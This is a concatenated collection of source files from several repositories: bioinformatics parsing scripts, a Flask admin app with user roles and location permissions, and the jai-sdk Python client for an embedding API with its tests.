dmat = pd.DataFrame(np.zeros((len(set(fdata_mesh)), len(class_labels))))
dmat.columns = class_labels
dmat.index = sorted(list(set(fdata_mesh)))
# appearance matrix summary
dsum = pd.DataFrame(np.zeros((len(set(fdata_mesh)), len(class_labels))))
dsum.columns = class_labels
dsum.index = sorted(list(set(fdata_mesh)))
for _mesh, _species in zip(fdata_mesh, fdata_species):
if _species in class_labels:
dmat.loc[_mesh, _species] = 1
dsum.loc[_mesh, _species] += 1
dmat = pd.concat([latlng, dmat], axis=1)
dsum = dsum.sum(axis=0)
print(dsum)
# write out the data
dmat.to_csv(output_fpath, header=True, index=True, sep='\t', compression='gzip')
dsum.to_csv(output_fpath.replace('.tsv', '').replace('.gz', '') + '.summary.tsv', header=False, index=True, sep='\t')
```
#### File: local/scripts/create_gene_chr_list.py
```python
import os
import sys
import re
import argparse
#
# ptyhon $this --gff camara/genome.modified.gff
#
def proc_main(gff_path):
gene2chr = {}
with open(gff_path, 'r') as fh:
for buf in fh:
r = buf.split('\t')
if r[2] == 'gene':
gene2chr[r[8][3:14]] = r[0]
for k, v in gene2chr.items():
print(k + '\t' + v)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'GO data generation.')
parser.add_argument('-g', '--gff', required = True)
args = parser.parse_args()
proc_main(args.gff)
```
#### File: local/scripts/sortvcf.py
```python
import sys
def main():
fp = open(sys.argv[1], "r")
vcfs = []
for line in fp:
if line[0] == "#":
print line.rstrip()
continue
cols = line.split("\t")
vcfs.append([cols[0], int(cols[1]), line.rstrip()])
vcfs = sorted(vcfs, key=lambda x:(x[0],x[1]))
for v in vcfs:
print v[2]
if __name__ == '__main__':
main()
```
#### File: fimmu.2018.00251/bin/make_cdr3_clusters_tsv.py
```python
import os
import sys
import argparse
import re
from Bio import SeqIO
def create_tsv(f, c, o):
# read FASTA file
fastafh = open(f, 'rU')
seqid2seq = {}
for record in SeqIO.parse(fastafh, "fasta"):
seqid2seq[record.description] = str(record.seq)
fastafh.close()
# read cluster file
mptn = re.compile(r'>(.+)\.\.\.')
clusterid2seqidlist = {}
clusterid2repseqid = {}
clusterid2seqsize_fugu1 = {}
clusterid2seqsize_fugu2 = {}
clusterid2seqsize_fugu3 = {}
cluster_id = None
with open(c, 'r') as clstrfh:
for buf in clstrfh:
if buf[0:1] == '>':
cluster_id = buf[1:]
cluster_id = cluster_id.replace('\n', '')
cluster_id = cluster_id.replace(' ', '_')
# init
clusterid2seqidlist[cluster_id] = []
clusterid2repseqid[cluster_id] = None
clusterid2seqsize_fugu1[cluster_id] = 0
clusterid2seqsize_fugu2[cluster_id] = 0
clusterid2seqsize_fugu3[cluster_id] = 0
else:
m = mptn.search(buf)
seqid = m.group(1)
if 'fugu1' in buf:
clusterid2seqsize_fugu1[cluster_id] += 1
if 'fugu2' in buf:
clusterid2seqsize_fugu2[cluster_id] += 1
if 'fugu3' in buf:
clusterid2seqsize_fugu3[cluster_id] += 1
if '*' in buf:
clusterid2seqidlist[cluster_id].append('*' + seqid)
clusterid2repseqid[cluster_id] = seqid
else:
clusterid2seqidlist[cluster_id].append(seqid)
# print out tsv
with open(o, 'w') as outfh:
outfh.write('ClusterID\tRepresentSeq\tRepresentSeqLen\tFugu1Count\tFugu2Count\tFugu3Count\tTotalCount\tSeqID')
for cls_id in sorted(clusterid2repseqid.iterkeys()):
arr = [cls_id,
seqid2seq[clusterid2repseqid[cls_id]],
str(len(seqid2seq[clusterid2repseqid[cls_id]])),
str(clusterid2seqsize_fugu1[cls_id]),
str(clusterid2seqsize_fugu2[cls_id]),
str(clusterid2seqsize_fugu3[cls_id]),
str(clusterid2seqsize_fugu1[cls_id] + clusterid2seqsize_fugu2[cls_id] + clusterid2seqsize_fugu3[cls_id]),
';'.join(clusterid2seqidlist[cls_id])]
outfh.write('\t'.join(arr) + '\n')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'Create CDR3 capture-recapture dataset.')
parser.add_argument('-f', '--fasta', required = True)
parser.add_argument('-c', '--clstr', required = True)
parser.add_argument('-o', '--output', required = True)
args = parser.parse_args()
create_tsv(args.fasta, args.clstr, args.output)
```
#### File: fimmu.2018.00251/bin/make_cluster_abudance.py
```python
import os
import sys
import argparse
import re
from Bio import SeqIO
def create_tsv(p, c, o):
pfiles = p.split(",")
mptn = re.compile(r'>(fugu[1-3])_(.+)\.\.\.')
class_type = {}
seq_dict = {}
with open(c, 'r') as clstrfh:
cluster_id = None
fugu_id = None
seq_id = None
for buf in clstrfh:
if buf[0:1] == '>':
cluster_id = buf[1:]
cluster_id = cluster_id.replace('\n', '')
cluster_id = cluster_id.replace(' ', '_')
else:
m = mptn.search(buf)
fugu_id = m.group(1)
seq_id = m.group(2)
seq_dict[seq_id] = {'F': fugu_id, 'C': cluster_id}
if cluster_id not in class_type:
class_type[cluster_id] = {'N': 0}
class_type[cluster_id][fugu_id] = 1
class_type[cluster_id]['N'] += 1
outfh = open(o, 'w')
for pfile in pfiles:
with open(pfile, 'r') as pfh:
for buf in pfh:
buf = buf.replace('\n', '')
if buf[0:6] == '#BEGIN':
seq_id = None
vdel = None
jdel = None
vjins = None
cdr3aa = None
if buf[0:2] == 'QN':
seq_id = buf[3:]
if buf[0:2] == 'VD':
vdel = buf[3:]
if vdel == '.':
vdel = ''
if buf[0:2] == 'JD':
jdel = buf[3:]
if jdel == '.':
jdel = ''
if buf[0:2] == 'VJ':
vjins = buf[3:]
if vjins == '.':
vjins = ''
if buf[0:7] == '#CDR3AA':
cdr3aa = buf[8:]
if buf[0:4] == '#END':
if seq_id in seq_dict:
txt = seq_dict[seq_id]['C'] + '\t' + str(len(class_type[seq_dict[seq_id]['C']]) - 1) + '\t'
txt = txt + str(class_type[seq_dict[seq_id]['C']]['N']) + '\t'
txt = txt + seq_dict[seq_id]['F'] + '\t'# + seq_id + '\t'
txt = txt + cdr3aa + '\t' + vdel + '\t' + jdel + '\t' + vjins + '\n'
outfh.write(txt)
outfh.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'Create CDR3 capture-recapture dataset.')
parser.add_argument('-p', '--pydair', required = True)
parser.add_argument('-c', '--clstr', required = True)
parser.add_argument('-o', '--output', required = True)
args = parser.parse_args()
create_tsv(args.pydair, args.clstr, args.output)
``` |
{
"source": "jqsunac/pandabox",
"score": 3
} |
#### File: pandabox/seqUtils/vcf.py
```python
import os
import sys
import re
import gzip
class VCF:
'''
VCF file format, POS with the 1st base having position 1.
'''
def __init__(self):
pass
def parse_vcf(self, file_path, chr_name=None, pos_range=None):
'''
Input: /path/to/vcf
Output: dictionary containing SNPs information. The key is
a position on the reference, value is a list which
contains two elements of REF and ALT.
'''
snp_dict = {}
infh = None
if os.path.splitext(file_path)[1] in ['.gz', '.gzip']:
infh = gzip.open(file_path, 'rt')
else:
infh = open(file_path, 'r')
for file_buff in infh:
if file_buff[0] == '#':
continue
vcf_record = file_buff.replace('\n', '').split('\t')
# discard if not target chromosome
if chr_name is not None and chr_name != vcf_record[0]:
continue
# discard if not in the target ranges
if pos_range is not None and (int(vcf_record[1]) < pos_range[0] or pos_range[1] < int(vcf_record[1])):
continue
if vcf_record[0] not in snp_dict:
snp_dict[vcf_record[0]] = []
vcf_tags = {}
for attr, val in zip(vcf_record[8].split(':'), vcf_record[9].split(':')):
vcf_tags[attr] = val
snp_dict[vcf_record[0]].append({
'POS': int(vcf_record[1]),
'REF': vcf_record[3],
'ALT': vcf_record[4],
'QUAL': float(vcf_record[5]),
'INFO': vcf_tags
})
infh.close()
if len(snp_dict) > 0:
for chr_name in snp_dict.keys():
snp_dict[chr_name].sort(key=lambda x: x['POS'])
return snp_dict
if __name__ == '__main__':
vcf = VCF()
vcf_fpath = '../../datasets/sample.vcf'
snp_dict = vcf.parse_vcf(vcf_fpath, chr_name='1', pos_range=[500, 1000])
print(snp_dict)
``` |
{
"source": "jquan2/time-of-need-backend",
"score": 2
} |
#### File: time-of-need-backend/ton/application.py
```python
from flask import Flask, abort, flash, redirect, render_template, request, url_for # noqa
from flask.ext import restful
from flask_admin import Admin
from flask_admin import helpers as admin_helpers
from flask_admin.contrib import sqla
from flask_security import SQLAlchemyUserDatastore, Security, current_user
from flask_security.utils import encrypt_password
from wtforms.fields import PasswordField
from .models import Location, Role, User, db
app = Flask(__name__)
app.config.from_pyfile('config.py')
db.init_app(app)
app.db = db
# Setup api
app.api = restful.Api(app)
from .api import api_initialize # noqa
api_initialize()
@app.route('/')
def index():
return render_template('index.html')
# Setup Flask-Security
user_datastore = SQLAlchemyUserDatastore(app.db, User, Role)
security = Security(app, user_datastore)
class PasswordNotGivenError(ValueError):
pass
class PasswordCompareError(ValueError):
pass
class BorkCurrentUserError(ValueError):
pass
# Create customized model view classes
class SecureView(sqla.ModelView):
def is_accessible(self):
"""Deny access if current_user isn't a logged-in admin"""
return (current_user.is_active and
current_user.is_authenticated and
current_user.has_role('Administrator'))
def _handle_view(self, name, **kwargs):
"""Redirect users when a view is not accessible"""
if not self.is_accessible():
if current_user.is_authenticated:
# permission denied
abort(403)
else:
# login
return redirect(url_for('security.login', next=request.url))
class StandardFilteredView(sqla.ModelView):
def is_accessible(self):
"""Deny access if current_user isn't a logged-in admin"""
return (current_user.is_active and
current_user.is_authenticated and (
current_user.has_role('Administrator') or
current_user.has_role('Standard')))
def _handle_view(self, name, **kwargs):
"""Redirect users when a view is not accessible"""
if not self.is_accessible():
if current_user.is_authenticated:
# permission denied
abort(403)
else:
# login
return redirect(url_for('security.login', next=request.url))
self.can_create = self.can_delete = current_user.has_role('Administrator') # noqa
# Given a location id, are we allowed to edit it?
def is_owned(self, id):
if current_user.has_role('Administrator'):
return True
allowed_locations = [location.id for location in current_user.locations]
return int(id) in allowed_locations
# Overrides to check model ownership
def on_model_change(self, form, model, is_created):
if not self.is_owned(model.id):
abort(403)
def on_form_prefill(self, form, id):
if not self.is_owned(id):
abort(403)
def on_model_delete(self, model):
if not self.is_owned(model.id):
abort(403)
# Query Overrides to limit Standard Users to Locations they Own
def get_query(self):
allowed_locations = [location.id for location in current_user.locations]
if current_user.has_role('Administrator'):
return self.session.query(self.model)
elif current_user.has_role('Standard'):
return self.session.query(self.model).filter(
self.model.id.in_(allowed_locations))
def get_count_query(self):
allowed_locations = [location.id for location in current_user.locations]
if current_user.has_role('Administrator'):
return super(StandardFilteredView, self).get_count_query()
elif current_user.has_role('Standard'):
return super(StandardFilteredView, self).get_count_query().filter(
self.model.id.in_(allowed_locations))
class LocationModelView(StandardFilteredView):
_list_columns = ["name", "services", "city", "state"]
_cols = [
("name", "e.g. Food Bank of Alaska"),
("services", "Click for drop-down choices. May select multiple "
"services. Type to filter."),
("description", ""),
("address_line1", "e.g. 123 Main St."),
("address_line2", "e.g. Ste. 200"),
("address_line3", "e.g. Fairbanks, AK 99775"),
("phone", "e.g. xxx-xxx-xxxx"),
("contact_email", "e.g. <EMAIL>"),
("website", "e.g. wehelppeople.org or www.wehelppeople.org"),
("opening_time", "Useful for locations with regular hours."),
("closing_time", "Useful for locations with regular hours."),
("days_of_week", "Useful for locations with regular hours."),
("city", "Useful for sorting locations. Not sent to mobile devices."),
("state", "Useful for sorting locations. Not sent to mobile devices."),
]
can_view_details = True
column_details_list = [name for name, _ in _cols]
column_default_sort = "name"
column_descriptions = dict(_cols)
column_editable_list = ["city", "state"]
column_list = _list_columns # List view only
form_columns = [name for name, _ in _cols if name not in ["city", "state"]]
class UserModelView(SecureView):
_cols = [
("username", "Account Name"),
("roles", "User Permissions"),
("locations", "Locations Standard user is allowed to edit"),
("email", "Email Address (used for login)"),
("password", "<PASSWORD>"),
("active", "Is login permitted?"),
]
column_default_sort = "username"
column_descriptions = dict(_cols)
# Sub in a non-db-backed field for passwords
column_descriptions["new_password"] = "<PASSWORD> here"
column_descriptions["confirm_password"] = "<PASSWORD>"
column_exclude_list = form_excluded_columns = ['password', ]
def scaffold_form(self):
"""Add new_password field to form"""
form_class = super(UserModelView, self).scaffold_form()
form_class.new_password = PasswordField('<PASSWORD>')
form_class.confirm_password = PasswordField('<PASSWORD>')
return form_class
def on_model_change(self, form, model, is_created):
"""Use new_password field. Block self-deactivation."""
# This problem already nailed a user.
model.username = model.username.strip()
model.email = model.email.strip()
if is_created and not model.new_password:
raise PasswordNotGivenError("You must give new users a password.")
if model == current_user and not model.active:
raise BorkCurrentUserError("You may not deactivate your own account.") # noqa
if model.new_password:
if model.new_password == model.confirm_password:
model.password = <PASSWORD>(<PASSWORD>)
else:
raise PasswordCompareError("Passwords do not match.")
def on_model_delete(self, model):
"""Block self-deletion"""
if model == current_user:
raise BorkCurrentUserError("You may not delete your own account.")
def handle_view_exception(self, exc):
validation_exceptions = [
PasswordNotGivenError,
PasswordCompareError,
BorkCurrentUserError,
]
for e in validation_exceptions:
if isinstance(exc, e):
flash(str(exc), 'error')
return True
return super(UserModelView, self).handle_view_exception(exc)
# Setup Flask-Admin
admin = Admin(app, name='Time of Need Admin', template_mode='bootstrap3',
base_template='my_master.html')
admin.add_view(LocationModelView(Location, db.session, name="Locations"))
admin.add_view(UserModelView(User, db.session, name="Users"))
# Define a context processor for merging flask-admin's template context into
# the flask-security views.
@security.context_processor
def security_context_processor():
return dict(
admin_base_template=admin.base_template,
admin_view=admin.index_view,
h=admin_helpers,
)
``` |
{
"source": "jquant/jai-sdk",
"score": 2
} |
#### File: jquant/jai-sdk/setup.py
```python
import os
import re
from setuptools import find_packages, setup
ROOT_DIR = os.path.dirname(__file__)
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
with open("requirements.txt", "r") as f:
dependencies = f.read().splitlines()
def find_version(*filepath):
# Extract version information from filepath
with open(os.path.join(ROOT_DIR, *filepath)) as fp:
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
fp.read(), re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
setup(
name="jai-sdk",
version=find_version("jai", "__init__.py"),
author="JQuant",
author_email="<EMAIL>",
description="JAI - Trust your data",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/jquant/jai-sdk",
packages=find_packages(exclude=['tests', 'jai.tests']),
include_package_data=True,
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
python_requires=">=3.7",
install_requires=dependencies,
)
``` |
{
"source": "jquant/mycelia-sdk",
"score": 3
} |
#### File: mycelia-sdk/jai/base.py
```python
import os
import json
import requests
import functools
from copy import copy
from .functions.classes import Mode
from .functions import exceptions
__all__ = ["BaseJai"]
def raise_status_error(code):
"""
Decorator to process responses with unexpected response codes.
Args
----
code: int
Expected Code.
"""
def decorator(function):
@functools.wraps(function)
def new_function(*args, **kwargs):
response = function(*args, **kwargs)
if response.status_code == code:
return response.json()
# find a way to process this
# what errors to raise, etc.
message = f"Something went wrong.\n\nSTATUS: {response.status_code}\n"
try:
res_json = response.json()
print(res_json)
if isinstance(res_json, dict):
detail = res_json.get(
'message', res_json.get('detail', response.text))
else:
detail = response.text
except:
detail = response.text
detail = str(detail)
if "Error: " in detail:
error, msg = detail.split(": ", 1)
try:
raise eval(error)(message + msg)
except NameError:
raise eval("exceptions." + error)(message + msg)
except:
raise ValueError(message + response.text)
else:
raise ValueError(message + detail)
return new_function
return decorator
class BaseJai(object):
"""
Base class for requests with the Mycelia API.
"""
def __init__(self,
auth_key: str = None,
url: str = None,
var_env: str = "JAI_SECRET"):
"""
Inicialize the Jai class.
An authorization key is needed to use the Mycelia API.
Parameters
----------
auth_key : str
Authorization key for the use of the API.
url : str, optional
Param used for development purposes. `Default is None`.
Returns
-------
None
"""
if auth_key is None:
auth_key = os.environ.get(var_env, "")
if url is None:
self.__url = "https://mycelia.azure-api.net"
self.header = {"Auth": auth_key}
else:
self.__url = url[:-1] if url.endswith("/") else url
self.header = {"company-key": auth_key}
@property
def url(self):
"""
Get name and type of each database in your environment.
"""
return self.__url
@raise_status_error(200)
def _info(self, mode="complete", get_size=True):
"""
Get name and type of each database in your environment.
"""
get_size = json.dumps(get_size)
return requests.get(url=self.url +
f"/info?mode={mode}&get_size={get_size}",
headers=self.header)
@raise_status_error(200)
def _status(self):
"""
Get the status of your JAI environment when training.
"""
return requests.get(self.url + "/status", headers=self.header)
@raise_status_error(200)
def _delete_status(self, name):
return requests.delete(self.url + f"/status?db_name={name}",
headers=self.header)
@raise_status_error(200)
def _download_vectors(self, name: str):
"""
Download vectors from a particular database.
Args
----
name : str
String with the name of a database in your JAI environment.
"""
return requests.get(self.url + f"/key/{name}", headers=self.header)
@raise_status_error(200)
def _filters(self, name):
"""
Gets the valid values of filters.
Args
----
name : str
String with the name of a database in your JAI environment.
"""
return requests.get(self.url + f"/filters/{name}", headers=self.header)
@raise_status_error(200)
def _similar_id(self,
name: str,
id_item: list,
top_k: int = 5,
filters=None):
"""
Creates a list of dicts, with the index and distance of the k items most similars given an id.
This is a protected method.
Args
----
name : str
String with the name of a database in your JAI environment.
id_item : list
List of ids of the item the user is looking for.
top_k : int
Number of k similar items we want to return. `Default is 5`.
Return
------
response : dict
Dictionary with the index and distance of `the k most similar items`.
"""
if not isinstance(id_item, list):
raise TypeError(
f"id_item param must be int or list, `{id_item.__class__.__name__}` found."
)
filtering = "" if filters is None else "".join(
["&filters=" + s for s in filters])
url = self.url + f"/similar/id/{name}?top_k={top_k}" + filtering
return requests.put(
url,
headers=self.header,
json=id_item,
)
@raise_status_error(200)
def _similar_json(self,
name: str,
data_json,
top_k: int = 5,
filters=None):
"""
Creates a list of dicts, with the index and distance of the k items most similars given a JSON data entry.
This is a protected method
Args
----
name : str
String with the name of a database in your JAI environment.
data_json : dict (JSON)
Data in JSON format. Each input in the dictionary will be used to search for the `top_k` most
similar entries in the database.
top_k : int
Number of k similar items we want to return. `Default is 5`.
Return
------
response : dict
Dictionary with the index and distance of `the k most similar items`.
"""
filtering = "" if filters is None else "".join(
["&filters=" + s for s in filters])
url = self.url + f"/similar/data/{name}?top_k={top_k}" + filtering
header = copy(self.header)
header['Content-Type'] = "application/json"
return requests.put(url, headers=header, data=data_json)
@raise_status_error(200)
def _predict(self, name: str, data_json, predict_proba: bool = False):
"""
Predict the output of new data for a given database by calling its
respecive API method. This is a protected method.
Args
----
name : str
String with the name of a database in your JAI environment.
data_json : JSON file (dict)
Data to be inferred by the previosly trained model.
predict_proba : bool
Whether or not to return the probabilities of each prediction. `Default is False`.
Return
-------
results : dict
Dictionary of predctions for the data passed as parameter.
"""
url = self.url + \
f"/predict/{name}?predict_proba={predict_proba}"
header = copy(self.header)
header['Content-Type'] = "application/json"
return requests.put(url, headers=header, data=data_json)
@raise_status_error(200)
def _ids(self, name: str, mode: Mode = "simple"):
"""
Get id information of a given database.
Args
mode : str, optional
Return
-------
response: list
List with the actual ids (mode: 'complete') or a summary of ids
('simple'/'summarized') of the given database.
Example
----------
>>> name = 'chosen_name'
>>> j = Jai(AUTH_KEY)
>>> ids = j.ids(name)
>>> print(ids)
['891 items from 0 to 890']
"""
return requests.get(self.url + f"/id/{name}?mode={mode}",
headers=self.header)
@raise_status_error(200)
def _is_valid(self, name: str):
"""
Check if a given name is a valid database name (i.e., if it is in your environment).
Args
----
`name`: str
String with the name of a database in your JAI environment.
Return
------
response: bool
True if name is in your environment. False, otherwise.
"""
return requests.get(self.url + f"/validation/{name}",
headers=self.header)
@raise_status_error(202)
def _append(self, name: str):
"""
Add data to a database that has been previously trained.
This is a protected method.
Args
----
name : str
String with the name of a database in your JAI environment.
Return
------
response : dict
Dictionary with the API response.
"""
return requests.patch(self.url + f"/data/{name}", headers=self.header)
@raise_status_error(200)
def _insert_json(self, name: str, data_json, filter_name: str = None):
"""
Insert data in JSON format. This is a protected method.
Args
----
name : str
String with the name of a database in your JAI environment.
data_json : dict
Data in JSON format.
Return
------
response : dict
Dictionary with the API response.
"""
filtering = "" if filter_name is None else f"?filter_name={filter_name}"
url = self.url + f"/data/{name}" + filtering
header = copy(self.header)
header['Content-Type'] = "application/json"
return requests.post(url, headers=header, data=data_json)
@raise_status_error(201)
def _setup(self, name: str, body, overwrite=False):
"""
Call the API method for database setup.
This is a protected method.
Args
----
name : str
String with the name of a database in your JAI environment.
db_type : str
Database type (Supervised, SelfSupervised, Text...)
overwrite : bool
[Optional] Whether of not to overwrite the given database. `Default is False`.
**kwargs:
Any parameters the user wants to (or needs to) set for the given datase. Please
refer to the API methods to see the possible arguments.
Return
-------
response : dict
Dictionary with the API response.
"""
overwrite = json.dumps(overwrite)
return requests.post(
self.url + f"/setup/{name}?overwrite={overwrite}",
headers=self.header,
json=body,
)
@raise_status_error(200)
def _report(self, name, verbose: int = 2):
"""
Get a report about the training model.
Parameters
----------
name : str
String with the name of a database in your JAI environment.
verbose : int, optional
Level of description. The default is 2.
Use verbose 2 to get the loss graph, verbose 1 to get only the
metrics result.
Returns
-------
dict
Dictionary with the information.
"""
return requests.get(self.url + f"/report/{name}?verbose={verbose}",
headers=self.header)
@raise_status_error(200)
def _temp_ids(self, name: str, mode: Mode = "simple"):
"""
Get id information of a RAW database (i.e., before training). This is a protected method
Args
----
name : str
String with the name of a database in your JAI environment.
mode : str, optional
Level of detail to return. Possible values are 'simple', 'summarized' or 'complete'.
Return
-------
response: list
List with the actual ids (mode: 'complete') or a summary of ids
('simple'/'summarized') of the given database.
"""
return requests.get(self.url + f"/setup/ids/{name}?mode={mode}",
headers=self.header)
@raise_status_error(200)
def _fields(self, name: str):
"""
Get the table fields for a Supervised/SelfSupervised database.
Args
----
name : str
String with the name of a database in your JAI environment.
Return
------
response : dict
Dictionary with table fields.
"""
return requests.get(self.url + f"/fields/{name}", headers=self.header)
@raise_status_error(200)
def _describe(self, name: str):
"""
Get the database hyperparameters and parameters of a specific database.
Args
----
name : str
String with the name of a database in your JAI environment.
Return
------
response : dict
Dictionary with database description.
"""
return requests.get(self.url + f"/describe/{name}",
headers=self.header)
@raise_status_error(200)
def _cancel_setup(self, name: str):
"""
Wait for the setup (model training) to finish
Placeholder method for scripts.
Args
----
name : str
String with the name of a database in your JAI environment.
frequency_seconds : int, optional
Number of seconds apart from each status check. `Default is 5`.
Return
------
None.
"""
return requests.post(self.url + f'/cancel/{name}', headers=self.header)
@raise_status_error(200)
def _delete_ids(self, name, ids):
"""
Delete the specified ids from database.
Args
----
name : str
String with the name of a database in your JAI environment.
ids : list
List of ids to be removed from database.
Return
-------
response : dict
Dictionary with the API response.
Example
----------
>>> name = 'chosen_name'
>>> j = Jai(AUTH_KEY)
>>> j.delete_raw_data(name=name)
'All raw data from database 'chosen_name' was deleted!'
"""
return requests.delete(self.url + f"/entity/{name}",
headers=self.header,
json=ids)
@raise_status_error(200)
def _delete_raw_data(self, name: str):
"""
Delete raw data. It is good practice to do this after training a model.
Args
----
name : str
String with the name of a database in your JAI environment.
Return
-------
response : dict
Dictionary with the API response.
Example
----------
>>> name = 'chosen_name'
>>> j = Jai(AUTH_KEY)
>>> j.delete_raw_data(name=name)
'All raw data from database 'chosen_name' was deleted!'
"""
return requests.delete(self.url + f"/data/{name}", headers=self.header)
@raise_status_error(200)
def _delete_database(self, name: str):
"""
Delete a database and everything that goes with it (I thank you all).
Args
----
name : str
String with the name of a database in your JAI environment.
Return
------
response : dict
Dictionary with the API response.
Example
-------
>>> name = 'chosen_name'
>>> j = Jai(AUTH_KEY)
>>> j.delete_database(name=name)
'Bombs away! We nuked database chosen_name!'
"""
return requests.delete(self.url + f"/database/{name}",
headers=self.header)
```
#### File: jai/functions/classes.py
```python
from enum import Enum
__all__ = ['FieldName', 'Mode', 'PossibleDtypes']
class PossibleDtypes(str, Enum):
image = "Image"
fasttext = "FastText"
selfsupervised = "SelfSupervised"
supervised = "Supervised"
text = "Text"
edit = "TextEdit"
class FieldName(str, Enum):
text = "text"
image = "image_base64"
def __str__(self):
return str(self.value)
class Mode(str, Enum):
complete = "complete"
summarized = "summarized"
simple = "simple"
```
#### File: jai/tests/test_zapi_applications.py
```python
from jai import Jai
from pandas.api.types import infer_dtype
from .test_utils import setup_dataframe
import pandas as pd
import numpy as np
import pytest
URL = 'http://localhost:8001'
AUTH_KEY = "sdk_test"
np.random.seed(42)
# =============================================================================
# Test Embedding
# =============================================================================
@pytest.mark.parametrize("name", ["test_embedding"])
def test_embedding(name, setup_dataframe):
train, test = setup_dataframe
train = train.rename(columns={
"PassengerId": "id"
}).set_index("id")['Name'].iloc[:10]
test = test.rename(columns={
"PassengerId": "id"
}).set_index("id")['Name'].iloc[:10]
j = Jai(url=URL, auth_key=AUTH_KEY)
if j.is_valid(name):
j.delete_database(name)
j.embedding(name, train, overwrite=True)
assert j.is_valid(name), f"valid name {name} after train embedding"
j.embedding(name, test)
assert j.is_valid(name), f"valid name {name} after test embedding"
j.delete_database(name)
assert not j.is_valid(name), "valid name after delete failed"
# =============================================================================
# Test Fill
# =============================================================================
@pytest.mark.parametrize("name", ["test_fill"])
def test_fill(name, setup_dataframe):
train, test = setup_dataframe
train = train.set_index("PassengerId").iloc[:10]
test = test.set_index("PassengerId").iloc[:10]
half = test.shape[0] // 2
data = pd.concat([train, test.iloc[:half]])
j = Jai(url=URL, auth_key=AUTH_KEY)
for n in j.names:
if n.startswith(name):
j.delete_database(n)
x = j.fill(name, data, column="Survived")
assert j.is_valid(name), f"valid name {name} after train fill"
assert j.ids(name) == ['15 items from 1 to 896'], 'wrong ids values sanity'
v = j.fill(name, test.iloc[half:], column="Survived")
assert j.ids(name) == ['20 items from 1 to 901'], 'wrong ids values sanity'
j.delete_database(name)
assert not j.is_valid(name), "valid name after delete failed"
# =============================================================================
# Test Sanity
# =============================================================================
@pytest.mark.parametrize("name", ["test_sanity"])
def test_sanity(name, setup_dataframe):
train, test = setup_dataframe
train = train.set_index("PassengerId").iloc[:50]
test = test.set_index("PassengerId").iloc[:50]
half = test.shape[0] // 2
data = pd.concat([train, test.iloc[:half]]).drop(columns=['Survived'])
j = Jai(url=URL, auth_key=AUTH_KEY)
for n in j.names:
if n.startswith(name):
j.delete_database(n)
x = j.sanity(name, data)
assert j.is_valid(name), f"valid name {name} after train sanity"
v = j.sanity(name, test.iloc[half:])
j.delete_database(name)
assert not j.is_valid(name), "valid name after delete failed"
# =============================================================================
# Test Match Application
# =============================================================================
@pytest.mark.parametrize("name", ["test_match"])
def test_match(name):
A = [
"Apple", "Watermelon", "Orange", "Nectarine", "Grape", "Lemon",
"Blueberry", "Pomegranate", "Banana", "Papaya", "Pineapple",
"Grapefruit", "Coconut", "Avocado", "Peach"
]
B = [
'Coconit', 'Pdach', 'Appld', 'Piheapplr', 'Banxna', 'Avocado', 'Grwpe'
]
expected = [12, 14, 0, 10, 8, 13, 4]
data_left = pd.Series(A)
data_right = pd.Series(B)
j = Jai(url=URL, auth_key=AUTH_KEY)
if j.is_valid(name):
j.delete_database(name)
ok = j.match(name,
data_left,
data_right,
top_k=15,
threshold=0.5,
original_data=True)
assert ok['id_left'].tolist() == expected, "match failed"
# =============================================================================
# Test Resolution Application
# =============================================================================
@pytest.mark.parametrize("name", ["test_resolution"])
def test_resolution(name):
data = [
"Apple", "Watermelon", "Orange", "Strawberry", "Nectarine", "Grape",
"Blueberry", "Pomegranate", "Banana", "Raspberry", "Papaya",
"Pineapple", "Lemon", "Grapefruit", "Coconut", "Avocado", "Peach",
'Coconit', 'Pdach', 'Appld', 'Piheapplr', 'Banxna', 'Avocado', 'Grwpe',
'Grapw', 'Bluebeffy', 'Banwna', 'Strzwherry', 'Gdapefruir',
'Aatermelon', 'Piheaplle', 'Grzpe', 'Watermelon', 'Kemon', 'Bqnana',
'Bljwberry', 'Rsspherry', 'Bahana', 'Watrrmeloh', 'Pezch', 'Blusberrt',
'Grapegruit', 'Avocaeo'
]
expected = np.arange(19)
data = pd.Series(data)
j = Jai(url=URL, auth_key=AUTH_KEY)
if j.is_valid(name):
j.delete_database(name)
ok = j.resolution(name, data, top_k=20, threshold=.4, original_data=True)
assert ok['resolution_id'].isin(expected).all(), "resolution failed"
```
#### File: jai/tests/test_zjai_models.py
```python
from jai import Jai
from .test_utils import setup_dataframe
import pandas as pd
import numpy as np
import pytest
URL = 'http://localhost:8001'
AUTH_KEY = "sdk_test"
MAX_SIZE = 50
np.random.seed(42)
# =============================================================================
# Test Text
# =============================================================================
@pytest.mark.parametrize("name,dtype", [("test_nlp", "Text"),
("test_fasttext", "FastText"),
("test_edittext", "TextEdit")])
def test_text(name, dtype, setup_dataframe):
train, _ = setup_dataframe
train = train.rename(columns={
"PassengerId": "id"
}).set_index("id")['Name'].iloc[:MAX_SIZE]
ids = train.index.tolist()
query = train.loc[np.random.choice(ids, 10, replace=False)]
j = Jai(url=URL, auth_key=AUTH_KEY)
if j.is_valid(name):
j.delete_database(name)
j.setup(name, train, db_type=dtype, overwrite=True)
assert j.is_valid(name), f"valid name {name} after setup failed"
assert j.ids(name) == [f"{len(ids)} items from {min(ids)} to {max(ids)}"
], 'ids simple failed'
assert sorted(j.ids(name, 'complete')) == ids, "ids complete failed"
result = j.similar(name, query)
assert isinstance(result, list), "similar data result failed"
result = j.similar(name, pd.Series(query.index))
assert isinstance(result, list), "similar id series result failed"
result = j.similar(name, query.index)
assert isinstance(result, list), "similar id index result failed"
result = j.similar(name, query.index.tolist())
assert isinstance(result, list), "similar id list result failed"
result = j.similar(name, query.index.values)
assert isinstance(result, list), "similar id array result failed"
# try to use the fields method on a text database
# this will raise an exception
with pytest.raises(ValueError):
j.fields(name)
j.delete_database(name)
assert not j.is_valid(name), "valid name after delete failed"
# =============================================================================
# Test Self-supervised
# =============================================================================
def test_selfsupervised(setup_dataframe):
name = 'test_selfsupervised'
train, _ = setup_dataframe
